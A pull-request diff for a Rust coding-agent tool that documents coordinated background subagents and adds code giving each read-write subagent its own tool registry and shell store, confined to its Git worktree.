### PR TITLE
feat: coordinate isolated subagent dispatch

### DIFF
--- a/docs/subagent-dispatch-strategy.md
+++ b/docs/subagent-dispatch-strategy.md
@@ -1,103 +1,135 @@
-# Subagent Dispatch Strategy and Worktree-Isolated Writers
+# Coordinated Subagents
 
-## Status
+Dirge can coordinate background subagents so the main agent can split independent research, implementation, and review work across specialized profiles. Instead of reacting to each result as it arrives, dirge waits for the current batch to finish and gives the main agent one reconciliation update.
 
-Implemented coordinator runtime contract. Coordinator dispatch, profile activation, batch delivery, and retry behavior describe the current runtime. Worktree-isolated writer behavior below is the live isolation contract: implementations must preserve these guarantees when isolation is available. This document lists verification to run; it does not claim those commands have passed.
+This feature is opt-in. Without `subagent_dispatch_strategy`, `task` works as a normal independent subagent tool.
 
-## Scope
+> Coordinated dispatch runs in the interactive TUI. It is not enabled for `--print`, ACP, or other noninteractive runs.
 
-The coordinator is available only to the interactive TUI's `BackgroundStore`. It is not enabled for `--print`, ACP, or other noninteractive paths; `full` warns and behaves as `off` there. The manual `/orchestrate` and `/delegate` plugins remain proof-of-concept workflows and must not be combined with core `full` coordination.
+## Quick start
 
-The main agent owns planning, durable context, reconciliation, integration, and final verification. It provides the user one final concise summary, not intermediate batch summaries.
+Create one read-only and one read-write agent profile, then enable coordinated dispatch in `~/.config/dirge/config.json` or your project configuration:
 
-## Configuration
-
-```json
+```jsonc
 {
   "subagent_dispatch_strategy": "full",
-  "subagent_write_isolation": "auto"
+  "subagent_write_isolation": "auto",
+  "agents": {
+    "researcher": {
+      "model": "haiku",
+      "description": "Investigates the repository and reports findings",
+      "subagent": {
+        "tools": "readonly",
+        "max_turns": 15
+      }
+    },
+    "implementer": {
+      "model": "sonnet",
+      "description": "Implements isolated changes and verifies them",
+      "subagent": {
+        "tools": "readwrite",
+        "max_turns": 25,
+        "timeout_secs": 900
+      }
+    }
+  }
 }
 ```
 
-Both fields are tolerant `Option<String>` wire values, trimmed and case-normalized:
+Restart dirge after changing configuration. At startup, dirge resolves the eligible profiles and enables coordination only when it has both a `readonly` and a `readwrite` profile with tools available.
 
-- `subagent_dispatch_strategy`: `off` (default), `optional`, or `full`. Missing, empty, and invalid values resolve to `off`; invalid values warn and never enable coordination.
-- `subagent_write_isolation`: `auto` (default), `worktree`, or `serialize`. Missing, empty, and invalid values resolve to `auto`; invalid values warn.
-- Prefer `subagent.tools: "readwrite"`; do not use `"full"`, which is ambiguous with strategy mode.
+For the full profile format, precedence rules, and regular `task(agent="…")` use, see [Agent profiles](agents.md).
 
-`optional` permits direct trivial work. When it starts coordinated work, it follows the same batch, retry, isolation, reconciliation, and final-summary rules as `full`. `full` dispatches substantive tier-routed research, implementation, and review work.
+## Dispatch strategies
 
-Coordinator profiles are resolved from loaded agent definitions, not process-global route state. Readonly and readwrite profiles are deterministic by name; toolless profiles satisfy neither tier. `optional` enables only when both tiers exist, otherwise warns and degrades to `off`. `full` requires both tiers and fails interactive startup with a diagnostic when either is absent; it also fails when tools are disabled. Route resolution occurs at process startup, so `/cd` does not reload routes.
+Set `subagent_dispatch_strategy` to one of these values:
 
-## Dispatch, retry, and batch barrier
+- **`off`** — the default. `task(background=true)` results are delivered independently.
+- **`optional`** — the main agent may handle small tasks directly, but uses coordinated batches when it delegates work.
+- **`full`** — substantive routed work is delegated as coordinated background tasks.
 
-While enabled, every `task(background=true)` subagent dispatch is tracked in a coordinator generation, including default and toolless subagents. Background shells use a separate store and are unaffected.
+Invalid or empty values resolve to `off` with a warning. `optional` warns and disables coordination if the required profiles are unavailable. `full` reports a startup error instead, so a missing profile or disabled tools cannot silently change its behavior.
 
-- The first tracked task opens a generation. Later tracked tasks join it until delivery, even if another member has completed.
-- A generation is deliverable only after every member is terminal. A missing task record becomes a synthetic failure rather than leaving the barrier open.
-- Delivery atomically emits one reconciliation continuation, removes the generation's pending notifications, records history, and closes the generation. The next dispatch opens the next generation.
-- Notification draining, pending-notification checks, idle resume, interjections, and normal follow-ups respect this barrier. Partial results do not reach the model or trigger a phantom turn.
-- `task_status(wait=true)` does not reveal a partial payload for an active generation; it reports that reconciliation will deliver the result.
-- At most four background subagents run in a wave.
+## Profiles used for coordination
 
-`retry_of` is coordinator-only and requires `background=true`. It may name one known failed tracked task after delivery. Completed, running, cancelled, unknown, and already-retried tasks are rejected. Accepting a retry links both records; a second retry is rejected and the main agent repairs the work directly.
+A coordinating session needs both of these profile tiers:
 
-In `full`, tier-routed readonly and readwrite work requires `background=true`; inexpensive toolless foreground requests remain allowed. Every readwrite dispatch, foreground or background, passes writer-mutation safety checks.
+- **`readonly`** profiles can inspect the repository, search files, and use enabled web tools. Use them for research, review, and investigation.
+- **`readwrite`** profiles can also edit files and run commands. Use them for implementation work.
 
-## Writer isolation
+Profiles with `subagent.tools: "toolless"` do not satisfy either coordinator tier. The `allow` and `deny` fields can narrow a profile's tool set, but cannot grant tools outside its tier.
 
-Writer isolation resolves as follows:
+Useful subagent settings are:
 
-- `serialize` uses the parent checkout and permits only one active serialized writer.
-- `worktree` requires isolation prerequisites and rejects the writer if any prerequisite is unavailable.
-- `auto` uses an isolated worktree when possible; otherwise it logs the reason and serializes writers in the parent checkout.
+- `tools`: `toolless`, `readonly`, or `readwrite`.
+- `max_turns`: maximum number of turns for a tooled subagent. The default is 25.
+- `timeout_secs`: wall-clock timeout in seconds. Dirge clamps it to 30 through 3600 seconds.
+- `allow` and `deny`: restrict the selected tier's tool set further.
 
-Isolated writers may run concurrently, subject to the four-subagent cap. Serialized writers cannot overlap, including with a foreground parent-checkout writer.
+In Markdown profiles, use the corresponding frontmatter names:
 
-A worktree requires the `git-worktree` feature, a canonical Git session repository, a clean parent working tree according to `git status --porcelain`, supported sandbox mode, and successful worktree creation. Ignored scratch files do not make that porcelain status dirty. The clean-parent requirement prevents writers from missing uncommitted parent changes because linked worktrees begin at committed `HEAD`.
-
-Names use a safe full task UUID: `dirge-task-<task-uuid>` for both the branch and sibling worktree directory. Creation validates repository, branch, and directory inputs, uses argument vectors and Git `--` separators where supported, and cleans up a newly created worktree if later setup fails.
-
-MicroVM does not support isolated writers: `auto` warns and serializes, `worktree` rejects, and `serialize` remains shared-checkout behavior.
-
-## Rooted writer tools and sandboxing
-
-An isolated writer receives newly constructed, restricted tools rooted at its worktree; it never receives parent shared tool instances.
-
-- File tools resolve relative paths from the root and reject absolute, traversal, ancestor, and symlink escapes outside it.
-- Search and navigation tools default omitted paths to the root.
-- Bash starts with the worktree as its current directory.
-- Tools that cannot enforce the root are excluded.
-- The permission checker is cloned and retargeted to the root, so in-root paths are internal; root confinement runs before that checker.
-
-For an isolated writer under Bwrap, the runtime binds `/` read-only, the writer worktree read-write at its original path, and `<main-repo>/.git` read-write at its original path; the parent checkout working tree remains read-only. The command runs from the writer worktree. The `.git` mount is required for linked-worktree metadata, commits, objects, refs, and index updates.
-
-The writer preamble identifies the root and branch, prohibits parent-checkout modification, and requires the writer to inspect status, stage intended changes, make one descriptive commit, and report the commit hash, changed files, tests run, and unresolved issues.
-
-## Preservation and reconciliation
-
-Rust never auto-merges writer branches. The coordinator retains committed worktrees for reconciliation and merges valid branches through normal Git tools after resolving conflicts against the retained plan. Reviewers inspect the integrated parent tree only after that merge.
-
-Clean worktrees without useful committed work may be removed best-effort. Failed, timed-out, and cancelled worktrees are removed only when clean and contain no commits. Dirty worktrees and clean committed worktrees remain for salvage, and `cancel_all()` performs the same retention-aware cleanup. Crash leftovers are recoverable with `git worktree prune`.
-
-The single terminal reconciliation continuation includes every dispatch's original prompt and outcome, retry status, output-relay reference when applicable, and writer branch, path, commits, clean/dirty state, and retained salvage path. Before the next dispatch, repair, merge, or verification decision, the coordinator creates an internal status summary covering completed work, failures, remaining requirements, required verification, and the next action.
-
-## Verification
-
-The runtime has focused checks for configuration tolerance; profile resolution and activation; timeout and route metadata; generation barriers and synthetic failures; retry limits; writer exclusion and isolation fallback; worktree validation and clean-only cleanup; rooted path and Bash confinement; permission scoping; Bwrap commit behavior with an unchanged parent source tree; and reconciliation metadata. Run the relevant checks below when changing those areas.
-
-Run the relevant checks, including:
-
-```bash
-cargo fmt --check
-cargo test --bin dirge coordinator
-cargo test --bin dirge background
-cargo test --bin dirge task
-cargo test --bin dirge agent_defs
-cargo test --bin dirge git_worktree
-cargo test --no-default-features --features loop --bin dirge coordinator
-cargo clippy --all-targets -- -D warnings
-cargo test --bin dirge
+```markdown
+---
+description: Repository investigator
+subagent_tools: readonly
+subagent_max_turns: 15
+subagent_timeout_secs: 600
+subagent_deny: [webfetch]
+---
+Investigate the requested area, cite relevant files, and return concise findings.
 ```
 
-The no-default-feature coordinator check verifies the unavailable-isolation contract: `auto` serializes and `worktree` reports an actionable error when Git-worktree support is not compiled.
+## How a coordinated batch works
+
+The main agent starts subagents with `task(background=true)`. A batch can include up to four running subagents.
+
+Dirge collects all terminal results in the current batch before continuing the coordinator. The reconciliation update includes each task's prompt and outcome, retry information, and—when a writer ran in a worktree—its branch, path, commits, and retention status.
+
+This prevents the main agent from acting on a partial implementation while another task in the same batch is still running. Background shell commands are separate from subagent dispatch and are not part of this barrier.
+
+### Retries
+
+A failed coordinated task can be retried once with `retry_of=<task-id>`. The original task must be a known failed coordinator task. Completed, running, cancelled, unknown, and already-retried tasks cannot be retried.
+
+Cancelled work is intentionally not retryable: the main agent should decide whether to start new work after the cancellation rather than treating it as an ordinary task failure.
+
+## Read-write subagents and worktrees
+
+Read-write subagents can modify code. Set `subagent_write_isolation` to choose where they work:
+
+- **`auto`** — the default. Dirge creates an isolated Git worktree when it can; otherwise it warns and runs one serialized writer in the parent checkout.
+- **`worktree`** — require a worktree. The dispatch fails if isolation is unavailable.
+- **`serialize`** — always use the parent checkout and allow only one writer at a time.
+
+Worktree isolation requires a Git repository with a clean parent checkout, the `git-worktree` feature, and a supported sandbox. It is unavailable in the MicroVM sandbox. In `auto` mode, unavailable isolation falls back to serialized parent-checkout execution; in `worktree` mode, it fails instead.
+
+An isolated writer gets a newly built tool registry rooted at its own worktree. Its file, search, navigation, and shell tools are confined to that checkout. Background shell jobs also use a writer-local store, so the writer cannot inspect or terminate the parent agent's shell jobs.
+
+Worktrees and branches use a `dirge-task-<task-uuid>` name. The writer is instructed to inspect its status, make a descriptive commit, run relevant checks, and report its commit, changed files, tests, and unresolved issues.
+
+### Reconciliation and cleanup
+
+Dirge does not automatically merge a writer branch. The main agent reviews the result, chooses whether to merge it, and performs any integration and final verification in the main checkout.
+
+A dirty worktree or a worktree containing commits is retained for recovery. A clean worktree with no commits may be removed. If a session is cancelled, the same retention rule applies, so useful committed work remains available at the reported salvage path.
+
+## Operational limits
+
+- Coordinated subagents must run in the background. Read-write coordinator profiles cannot run as foreground tasks because their isolation and lifecycle tracking are background-only.
+- At most four background subagents run at once.
+- The coordinator is separate from the manual `orchestrator.janet` and `delegate.janet` plugin workflows. Do not combine them in the same session.
+- `/cd` does not reload coordinator profiles. Restart dirge after changing profile definitions or project directory configuration.
+
+## Troubleshooting
+
+- **Coordinator mode does not start:** ensure tools are enabled and that loaded profiles include both `readonly` and `readwrite` tiers. `full` prints the missing tier at startup.
+- **A writer runs in the parent checkout:** `auto` could not create an isolated worktree, commonly because the parent checkout has uncommitted changes, Git worktree support is unavailable, or the active sandbox does not support it.
+- **A writer dispatch fails immediately:** use `auto` for fallback behavior, or fix the repository/sandbox prerequisite required by `worktree` mode.
+- **A writer's changes are not in the main branch:** this is expected. Inspect the reconciliation result and merge the reported branch deliberately.
+- **A task result has not appeared yet:** a coordinated batch is delivered only after every task in that batch reaches a terminal state. Do not poll for partial output; continue other work or wait for the reconciliation update.
+
+## Related documentation
+
+- [Agent profiles](agents.md) for defining subagent profiles and their tool policies.
+- [Permissions](permissions.md) for the authorization policy that still applies to subagent tool calls.
+- [Configuration](config.md) for sandbox and other runtime configuration.

--- a/docs/subagent-dispatch-strategy.md
+++ b/docs/subagent-dispatch-strategy.md
@@ -97,11 +97,11 @@ Cancelled work is intentionally not retryable: the main agent should decide whet
 
 Read-write subagents can modify code. Set `subagent_write_isolation` to choose where they work:
 
-- **`auto`** — the default. Dirge creates an isolated Git worktree when it can; otherwise it warns and runs one serialized writer in the parent checkout.
+- **`auto`** — the default. Dirge creates an isolated Git worktree when it can; otherwise it runs one serialized writer in the parent checkout.
 - **`worktree`** — require a worktree. The dispatch fails if isolation is unavailable.
 - **`serialize`** — always use the parent checkout and allow only one writer at a time.
 
-Worktree isolation requires a Git repository with a clean parent checkout, the `git-worktree` feature, and a supported sandbox. It is unavailable in the MicroVM sandbox. In `auto` mode, unavailable isolation falls back to serialized parent-checkout execution; in `worktree` mode, it fails instead.
+Worktree write-isolation requires a Linux sandbox (bwrap). Without a confining sandbox, the writer's shell could escape the worktree via `../` or absolute paths — a false isolation guarantee — so dirge refuses to create a worktree for `auto` and errors on `worktree`. When a worktree is unavailable, `auto` falls back to running the writer *serialized in the parent checkout*. This fallback path **requires a clean parent checkout** — a dirty checkout makes the writer fail with a clear message; commit or stash first. `worktree` mode fails whenever a worktree cannot be created (no confining sandbox, missing `git-worktree` feature, dirty parent, or MicroVM sandbox — which has its own full isolation).
 
 An isolated writer gets a newly built tool registry rooted at its own worktree. Its file, search, navigation, and shell tools are confined to that checkout. Background shell jobs also use a writer-local store, so the writer cannot inspect or terminate the parent agent's shell jobs.
 
@@ -123,8 +123,9 @@ A dirty worktree or a worktree containing commits is retained for recovery. A cl
 ## Troubleshooting
 
 - **Coordinator mode does not start:** ensure tools are enabled and that loaded profiles include both `readonly` and `readwrite` tiers. `full` prints the missing tier at startup.
-- **A writer runs in the parent checkout:** `auto` could not create an isolated worktree, commonly because the parent checkout has uncommitted changes, Git worktree support is unavailable, or the active sandbox does not support it.
+- **A writer runs in the parent checkout:** `auto` could not create an isolated worktree because Git worktree support is unavailable or the active sandbox is not confining (not bwrap), so the writer runs serialized in the parent checkout — which must be clean (see below).
 - **A writer dispatch fails immediately:** use `auto` for fallback behavior, or fix the repository/sandbox prerequisite required by `worktree` mode.
+- **A writer fails with "cannot run a read-write subagent in a dirty parent checkout":** commit or stash your uncommitted changes, or run under a Linux bwrap sandbox for worktree isolation.
 - **A writer's changes are not in the main branch:** this is expected. Inspect the reconciliation result and merge the reported branch deliberately.
 - **A task result has not appeared yet:** a coordinated batch is delivered only after every task in that batch reaches a terminal state. Do not poll for partial output; continue other work or wait for the reconciliation update.
 

--- a/docs/subagent-dispatch-strategy.md
+++ b/docs/subagent-dispatch-strategy.md
@@ -1,0 +1,103 @@
+# Subagent Dispatch Strategy and Worktree-Isolated Writers
+
+## Status
+
+Implemented coordinator runtime contract. Coordinator dispatch, profile activation, batch delivery, and retry behavior describe the current runtime. Worktree-isolated writer behavior below is the live isolation contract: implementations must preserve these guarantees when isolation is available. This document lists verification to run; it does not claim those commands have passed.
+
+## Scope
+
+The coordinator is available only to the interactive TUI's `BackgroundStore`. It is not enabled for `--print`, ACP, or other noninteractive paths; `full` warns and behaves as `off` there. The manual `/orchestrate` and `/delegate` plugins remain proof-of-concept workflows and must not be combined with core `full` coordination.
+
+The main agent owns planning, durable context, reconciliation, integration, and final verification. It provides the user one final concise summary, not intermediate batch summaries.
+
+## Configuration
+
+```json
+{
+  "subagent_dispatch_strategy": "full",
+  "subagent_write_isolation": "auto"
+}
+```
+
+Both fields are tolerant `Option<String>` wire values, trimmed and case-normalized:
+
+- `subagent_dispatch_strategy`: `off` (default), `optional`, or `full`. Missing, empty, and invalid values resolve to `off`; invalid values warn and never enable coordination.
+- `subagent_write_isolation`: `auto` (default), `worktree`, or `serialize`. Missing, empty, and invalid values resolve to `auto`; invalid values warn.
+- Prefer `subagent.tools: "readwrite"`; do not use `"full"`, which is ambiguous with strategy mode.
+
+`optional` permits direct trivial work. When it starts coordinated work, it follows the same batch, retry, isolation, reconciliation, and final-summary rules as `full`. `full` dispatches substantive tier-routed research, implementation, and review work.
+
+Coordinator profiles are resolved from loaded agent definitions, not process-global route state. Readonly and readwrite profiles are deterministic by name; toolless profiles satisfy neither tier. `optional` enables only when both tiers exist, otherwise warns and degrades to `off`. `full` requires both tiers and fails interactive startup with a diagnostic when either is absent; it also fails when tools are disabled. Route resolution occurs at process startup, so `/cd` does not reload routes.
+
+## Dispatch, retry, and batch barrier
+
+While enabled, every `task(background=true)` subagent dispatch is tracked in a coordinator generation, including default and toolless subagents. Background shells use a separate store and are unaffected.
+
+- The first tracked task opens a generation. Later tracked tasks join it until delivery, even if another member has completed.
+- A generation is deliverable only after every member is terminal. A missing task record becomes a synthetic failure rather than leaving the barrier open.
+- Delivery atomically emits one reconciliation continuation, removes the generation's pending notifications, records history, and closes the generation. The next dispatch opens the next generation.
+- Notification draining, pending-notification checks, idle resume, interjections, and normal follow-ups respect this barrier. Partial results do not reach the model or trigger a phantom turn.
+- `task_status(wait=true)` does not reveal a partial payload for an active generation; it reports that reconciliation will deliver the result.
+- At most four background subagents run in a wave.
+
+`retry_of` is coordinator-only and requires `background=true`. It may name one known failed tracked task after delivery. Completed, running, cancelled, unknown, and already-retried tasks are rejected. Accepting a retry links both records; a second retry is rejected and the main agent repairs the work directly.
+
+In `full`, tier-routed readonly and readwrite work requires `background=true`; inexpensive toolless foreground requests remain allowed. Every readwrite dispatch, foreground or background, passes writer-mutation safety checks.
+
+## Writer isolation
+
+Writer isolation resolves as follows:
+
+- `serialize` uses the parent checkout and permits only one active serialized writer.
+- `worktree` requires isolation prerequisites and rejects the writer if any prerequisite is unavailable.
+- `auto` uses an isolated worktree when possible; otherwise it logs the reason and serializes writers in the parent checkout.
+
+Isolated writers may run concurrently, subject to the four-subagent cap. Serialized writers cannot overlap, including with a foreground parent-checkout writer.
+
+A worktree requires the `git-worktree` feature, a canonical Git session repository, a clean parent working tree according to `git status --porcelain`, supported sandbox mode, and successful worktree creation. Ignored scratch files do not make that porcelain status dirty. The clean-parent requirement prevents writers from missing uncommitted parent changes because linked worktrees begin at committed `HEAD`.
+
+Names are safe single components, for example `dirge/subagent-<task8>` and `dirge-wt-<task8>`. Creation validates repository, branch, and directory inputs, uses argument vectors and Git `--` separators where supported, and cleans up a newly created worktree if later setup fails.
+
+MicroVM does not support isolated writers: `auto` warns and serializes, `worktree` rejects, and `serialize` remains shared-checkout behavior.
+
+## Rooted writer tools and sandboxing
+
+An isolated writer receives newly constructed, restricted tools rooted at its worktree; it never receives parent shared tool instances.
+
+- File tools resolve relative paths from the root and reject absolute, traversal, ancestor, and symlink escapes outside it.
+- Search and navigation tools default omitted paths to the root.
+- Bash starts with the worktree as its current directory.
+- Tools that cannot enforce the root are excluded.
+- The permission checker is cloned and retargeted to the root, so in-root paths are internal; root confinement runs before that checker.
+
+For an isolated writer under Bwrap, the runtime binds `/` read-only, the writer worktree read-write at its original path, and `<main-repo>/.git` read-write at its original path; the parent checkout working tree remains read-only. The command runs from the writer worktree. The `.git` mount is required for linked-worktree metadata, commits, objects, refs, and index updates.
+
+The writer preamble identifies the root and branch, prohibits parent-checkout modification, and requires the writer to inspect status, stage intended changes, make one descriptive commit, and report the commit hash, changed files, tests run, and unresolved issues.
+
+## Preservation and reconciliation
+
+Rust never auto-merges writer branches. The coordinator retains committed worktrees for reconciliation and merges valid branches through normal Git tools after resolving conflicts against the retained plan. Reviewers inspect the integrated parent tree only after that merge.
+
+Clean worktrees without useful committed work may be removed best-effort. Failed, timed-out, and cancelled worktrees are removed only when clean. Dirty worktrees remain for salvage, and `cancel_all()` performs clean-only cleanup. Crash leftovers are recoverable with `git worktree prune`.
+
+The single terminal reconciliation continuation includes every dispatch's original prompt and outcome, retry status, output-relay reference when applicable, and writer branch, path, commits, clean/dirty state, and retained salvage path. Before the next dispatch, repair, merge, or verification decision, the coordinator creates an internal status summary covering completed work, failures, remaining requirements, required verification, and the next action.
+
+## Verification
+
+The runtime contract is covered by focused checks for configuration tolerance; profile resolution and activation; timeout and route metadata; generation barriers and synthetic failures; retry limits; writer exclusion and isolation fallback; worktree validation and clean-only cleanup; rooted path and Bash confinement; permission scoping; Bwrap commit behavior with an unchanged parent source tree; and reconciliation metadata.
+
+Run the relevant checks, including:
+
+```bash
+cargo fmt --check
+cargo test --bin dirge coordinator
+cargo test --bin dirge background
+cargo test --bin dirge task
+cargo test --bin dirge agent_defs
+cargo test --bin dirge git_worktree
+cargo test --no-default-features --features loop --bin dirge coordinator
+cargo clippy --all-targets -- -D warnings
+cargo test --bin dirge
+```
+
+The no-default-feature coordinator check verifies the unavailable-isolation contract: `auto` serializes and `worktree` reports an actionable error when Git-worktree support is not compiled.

--- a/docs/subagent-dispatch-strategy.md
+++ b/docs/subagent-dispatch-strategy.md
@@ -56,7 +56,7 @@ Isolated writers may run concurrently, subject to the four-subagent cap. Seriali
 
 A worktree requires the `git-worktree` feature, a canonical Git session repository, a clean parent working tree according to `git status --porcelain`, supported sandbox mode, and successful worktree creation. Ignored scratch files do not make that porcelain status dirty. The clean-parent requirement prevents writers from missing uncommitted parent changes because linked worktrees begin at committed `HEAD`.
 
-Names are safe single components, for example `dirge/subagent-<task8>` and `dirge-wt-<task8>`. Creation validates repository, branch, and directory inputs, uses argument vectors and Git `--` separators where supported, and cleans up a newly created worktree if later setup fails.
+Names use a safe full task UUID: `dirge-task-<task-uuid>` for both the branch and sibling worktree directory. Creation validates repository, branch, and directory inputs, uses argument vectors and Git `--` separators where supported, and cleans up a newly created worktree if later setup fails.
 
 MicroVM does not support isolated writers: `auto` warns and serializes, `worktree` rejects, and `serialize` remains shared-checkout behavior.
 
@@ -78,13 +78,13 @@ The writer preamble identifies the root and branch, prohibits parent-checkout mo
 
 Rust never auto-merges writer branches. The coordinator retains committed worktrees for reconciliation and merges valid branches through normal Git tools after resolving conflicts against the retained plan. Reviewers inspect the integrated parent tree only after that merge.
 
-Clean worktrees without useful committed work may be removed best-effort. Failed, timed-out, and cancelled worktrees are removed only when clean. Dirty worktrees remain for salvage, and `cancel_all()` performs clean-only cleanup. Crash leftovers are recoverable with `git worktree prune`.
+Clean worktrees without useful committed work may be removed best-effort. Failed, timed-out, and cancelled worktrees are removed only when clean and contain no commits. Dirty worktrees and clean committed worktrees remain for salvage, and `cancel_all()` performs the same retention-aware cleanup. Crash leftovers are recoverable with `git worktree prune`.
 
 The single terminal reconciliation continuation includes every dispatch's original prompt and outcome, retry status, output-relay reference when applicable, and writer branch, path, commits, clean/dirty state, and retained salvage path. Before the next dispatch, repair, merge, or verification decision, the coordinator creates an internal status summary covering completed work, failures, remaining requirements, required verification, and the next action.
 
 ## Verification
 
-The runtime contract is covered by focused checks for configuration tolerance; profile resolution and activation; timeout and route metadata; generation barriers and synthetic failures; retry limits; writer exclusion and isolation fallback; worktree validation and clean-only cleanup; rooted path and Bash confinement; permission scoping; Bwrap commit behavior with an unchanged parent source tree; and reconciliation metadata.
+The runtime has focused checks for configuration tolerance; profile resolution and activation; timeout and route metadata; generation barriers and synthetic failures; retry limits; writer exclusion and isolation fallback; worktree validation and clean-only cleanup; rooted path and Bash confinement; permission scoping; Bwrap commit behavior with an unchanged parent source tree; and reconciliation metadata. Run the relevant checks below when changing those areas.
 
 Run the relevant checks, including:
 

--- a/src/agent/agent_loop/h7_smoke.rs
+++ b/src/agent/agent_loop/h7_smoke.rs
@@ -26,8 +26,6 @@
 //! the `AnyAgent::spawn_runner` integration is highly likely
 //! to work too because it composes the same pieces.
 
-#![cfg(test)]
-
 use std::sync::Arc;
 
 use crate::agent::agent_loop::{

--- a/src/agent/builder/loop_tools.rs
+++ b/src/agent/builder/loop_tools.rs
@@ -235,6 +235,162 @@ fn resolve_embedder(
     crate::extras::memory_hybrid::api_embedder(url, model, api_key)
 }
 
+/// Build an isolated registry for a writer working in a worktree.
+///
+/// This deliberately constructs new tool instances rather than filtering the
+/// parent's registry: the cache, permission grants, filesystem root, and bash
+/// execution directory must all belong to the worktree. Search tools use their
+/// native `ToolRoot` support; this function does not duplicate their path
+/// resolution logic.
+pub async fn build_rooted_writer_tools(
+    root: tools::ToolRoot,
+    parent_permission: Option<PermCheck>,
+    ask_tx: Option<AskSender>,
+    sandbox: Sandbox,
+    execution_root: crate::sandbox::SandboxExecutionRoot,
+) -> Vec<Arc<dyn crate::agent::agent_loop::LoopTool>> {
+    use crate::agent::agent_loop::types::ToolExecutionMode;
+    use crate::agent::agent_loop::{LoopTool, RigToolAdapter};
+
+    let permission = parent_permission.as_ref().map(|parent| {
+        crate::permission::checker::rooted_perm_check(parent, root.path().to_path_buf())
+    });
+
+    async fn wrap<T>(inner: T, mode: Option<ToolExecutionMode>) -> Arc<dyn LoopTool>
+    where
+        T: rig::tool::ToolDyn + 'static,
+    {
+        let adapter = RigToolAdapter::new(Box::new(inner)).await;
+        Arc::new(match mode {
+            Some(mode) => adapter.with_execution_mode(mode),
+            None => adapter,
+        })
+    }
+
+    let cache = ToolCache::new();
+    let mut writer_tools: Vec<Arc<dyn LoopTool>> = Vec::new();
+
+    writer_tools.push(
+        wrap(
+            tools::ReadTool::with_cache(
+                permission.clone(),
+                ask_tx.clone(),
+                cache.clone(),
+                #[cfg(feature = "lsp")]
+                None,
+            )
+            .rooted(root.clone()),
+            None,
+        )
+        .await,
+    );
+    // The rooted search tools keep investigation inside the worktree. Their
+    // own ToolRoot handling remains the single implementation of search-root
+    // resolution.
+    writer_tools.push(
+        wrap(
+            tools::GrepTool::with_cache(permission.clone(), ask_tx.clone(), cache.clone())
+                .with_root(root.clone()),
+            None,
+        )
+        .await,
+    );
+    writer_tools.push(
+        wrap(
+            tools::FindFilesTool::new(permission.clone(), ask_tx.clone()).with_root(root.clone()),
+            None,
+        )
+        .await,
+    );
+    writer_tools.push(
+        wrap(
+            tools::GlobTool::with_cache(permission.clone(), ask_tx.clone(), cache.clone())
+                .with_root(root.clone()),
+            None,
+        )
+        .await,
+    );
+    writer_tools.push(
+        wrap(
+            tools::ListDirTool::new(permission.clone(), ask_tx.clone()).with_root(root.clone()),
+            None,
+        )
+        .await,
+    );
+
+    writer_tools.push(
+        wrap(
+            tools::RepoOverviewTool::with_cache(permission.clone(), ask_tx.clone(), cache.clone())
+                .with_root(root.clone()),
+            None,
+        )
+        .await,
+    );
+    writer_tools.push(
+        wrap(
+            tools::WriteTool::with_cache(
+                permission.clone(),
+                ask_tx.clone(),
+                cache.clone(),
+                #[cfg(feature = "lsp")]
+                None,
+            )
+            .rooted(root.clone()),
+            Some(ToolExecutionMode::Sequential),
+        )
+        .await,
+    );
+    writer_tools.push(
+        wrap(
+            tools::EditTool::with_cache(
+                permission.clone(),
+                ask_tx.clone(),
+                cache.clone(),
+                #[cfg(feature = "lsp")]
+                None,
+            )
+            .rooted(root.clone()),
+            Some(ToolExecutionMode::Sequential),
+        )
+        .await,
+    );
+    writer_tools.push(
+        wrap(
+            tools::EditLinesTool::with_cache(
+                permission.clone(),
+                ask_tx.clone(),
+                cache.clone(),
+                #[cfg(feature = "lsp")]
+                None,
+            )
+            .rooted(root.clone()),
+            Some(ToolExecutionMode::Sequential),
+        )
+        .await,
+    );
+    writer_tools.push(
+        wrap(
+            tools::ApplyPatchTool::with_cache(permission.clone(), ask_tx.clone(), cache.clone())
+                .with_root(root.clone()),
+            Some(ToolExecutionMode::Sequential),
+        )
+        .await,
+    );
+    writer_tools.push(
+        wrap(
+            tools::BashTool::with_cache(permission, ask_tx, sandbox, cache)
+                .with_execution_root(Some(execution_root))
+                .with_shell_store(Some(tools::bg_shell::global())),
+            Some(ToolExecutionMode::Sequential),
+        )
+        .await,
+    );
+    writer_tools.push(wrap(tools::BashOutputTool::new(tools::bg_shell::global()), None).await);
+    writer_tools.push(wrap(tools::KillShellTool::new(tools::bg_shell::global()), None).await);
+
+    writer_tools
+}
+
 #[allow(clippy::too_many_arguments)]
 pub async fn build_loop_tools(
     cache: ToolCache,
@@ -680,7 +836,14 @@ pub async fn build_loop_tools(
     if let (Some(pm), Some(store)) = (parent_model, bg_store) {
         tools.push(
             wrap(
-                tools::TaskTool::new(permission.clone(), ask_tx.clone(), pm, store.clone()),
+                tools::TaskTool::new(
+                    permission.clone(),
+                    ask_tx.clone(),
+                    pm,
+                    store.clone(),
+                    sandbox.clone(),
+                    cfg.resolve_subagent_write_isolation(),
+                ),
                 Some(ToolExecutionMode::Sequential),
             )
             .await,

--- a/src/agent/builder/loop_tools.rs
+++ b/src/agent/builder/loop_tools.rs
@@ -268,6 +268,7 @@ pub async fn build_rooted_writer_tools(
     }
 
     let cache = ToolCache::new();
+    let shell_store = tools::bg_shell::BackgroundShellStore::new();
     let mut writer_tools: Vec<Arc<dyn LoopTool>> = Vec::new();
 
     writer_tools.push(
@@ -380,13 +381,13 @@ pub async fn build_rooted_writer_tools(
         wrap(
             tools::BashTool::with_cache(permission, ask_tx, sandbox, cache)
                 .with_execution_root(Some(execution_root))
-                .with_shell_store(Some(tools::bg_shell::global())),
+                .with_shell_store(Some(shell_store.clone())),
             Some(ToolExecutionMode::Sequential),
         )
         .await,
     );
-    writer_tools.push(wrap(tools::BashOutputTool::new(tools::bg_shell::global()), None).await);
-    writer_tools.push(wrap(tools::KillShellTool::new(tools::bg_shell::global()), None).await);
+    writer_tools.push(wrap(tools::BashOutputTool::new(shell_store.clone()), None).await);
+    writer_tools.push(wrap(tools::KillShellTool::new(shell_store), None).await);
 
     writer_tools
 }

--- a/src/agent/tools/apply_patch.rs
+++ b/src/agent/tools/apply_patch.rs
@@ -4,7 +4,9 @@ use serde::Deserialize;
 use std::path::Path;
 
 use crate::agent::tools::cache::ToolCache;
-use crate::agent::tools::{AskSender, PermCheck, ToolError, check_perm_path_resolve};
+use crate::agent::tools::{
+    AskSender, PermCheck, ToolError, ToolRoot, check_perm_path_resolve, resolve_tool_path,
+};
 
 /// Max content size for a single create op (1 MiB). Audit L5 noted
